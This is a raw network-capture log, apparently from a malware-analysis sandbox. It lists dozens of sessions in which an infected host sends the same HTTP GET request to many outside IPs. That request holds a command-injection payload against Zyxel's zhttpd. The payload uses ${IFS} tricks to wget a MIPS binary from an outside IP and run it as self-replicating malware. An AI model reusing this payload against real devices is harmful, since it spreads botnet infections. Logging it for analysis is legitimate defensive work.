                                      Jan 14, 2024 15:50:42.203982115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3214192.168.2.145296669.52.237.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204025030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3215192.168.2.1458476202.189.122.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204092979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3216192.168.2.144427835.18.133.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204144001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3217192.168.2.144924876.193.128.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204199076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3218192.168.2.1440166189.222.214.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204246998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3219192.168.2.145514481.210.215.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204309940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3220192.168.2.145642671.155.254.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204358101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3221192.168.2.1449118121.89.245.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204385042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3222192.168.2.1445440219.157.218.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204432011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3223192.168.2.1443310186.135.40.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204498053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3224192.168.2.1438464123.148.178.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204565048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3225192.168.2.145827070.65.228.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204600096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3226192.168.2.143323658.194.71.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204641104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3227192.168.2.1456282156.132.208.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204715967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3228192.168.2.143888465.193.215.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204751015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3229192.168.2.1434380139.69.201.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204813004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3230192.168.2.1448684142.86.101.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204879045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3231192.168.2.1457334147.217.215.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.204937935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3232192.168.2.145789284.49.44.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205002069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3233192.168.2.145298277.15.36.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205064058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3234192.168.2.1459124209.205.142.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205120087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3235192.168.2.1435226146.218.114.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205188990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3236192.168.2.1437164121.102.43.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205245972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3237192.168.2.1445312217.237.167.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205305099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3238192.168.2.1446634187.201.16.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205346107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3239192.168.2.145482864.64.98.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205415010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3240192.168.2.1444108136.98.84.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205440044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3241192.168.2.1448676104.144.90.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205482006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3242192.168.2.1438796195.73.151.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205542088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3243192.168.2.1442990116.176.123.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205621958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3244192.168.2.1450802152.117.57.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205679893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3245192.168.2.144628659.91.253.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205732107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3246192.168.2.145520283.252.86.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205785990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3247192.168.2.1444292167.3.113.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205852985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3248192.168.2.144677849.95.24.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205915928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3249192.168.2.1438670203.115.215.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.205971003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3250192.168.2.144354239.243.219.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206020117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3251192.168.2.1452452175.112.163.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206094980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3252192.168.2.1437548135.153.244.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206145048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3253192.168.2.144502641.187.143.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206177950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3254192.168.2.144939824.192.42.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206252098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3255192.168.2.14510688.216.8.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206295967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3256192.168.2.1438982189.239.60.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206358910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3257192.168.2.1432788186.27.174.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206410885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3258192.168.2.1434706221.29.245.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206466913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3259192.168.2.1436782217.132.112.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206510067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3260192.168.2.145582850.17.77.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206585884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3261192.168.2.143866871.140.49.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206645966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3262192.168.2.143834832.200.130.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206698895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3263192.168.2.1441892218.30.165.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206760883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3264192.168.2.1446492115.179.114.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206823111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3265192.168.2.1445684115.139.247.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206851959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3266192.168.2.1451856144.81.84.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206907034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3267192.168.2.1452002114.175.191.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.206959009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3268192.168.2.145874298.15.46.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207010031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3269192.168.2.1447214162.148.124.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207067013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3270192.168.2.1452030170.26.89.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207134962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3271192.168.2.144326451.67.100.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207178116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3272192.168.2.1451094184.134.92.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207231998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3273192.168.2.145646852.113.36.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207304955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3274192.168.2.1446892155.18.233.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207381964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3275192.168.2.143857465.216.142.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:42.207408905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3276192.168.2.1435684147.71.10.27443
                                      TimestampBytes transferredDirectionData
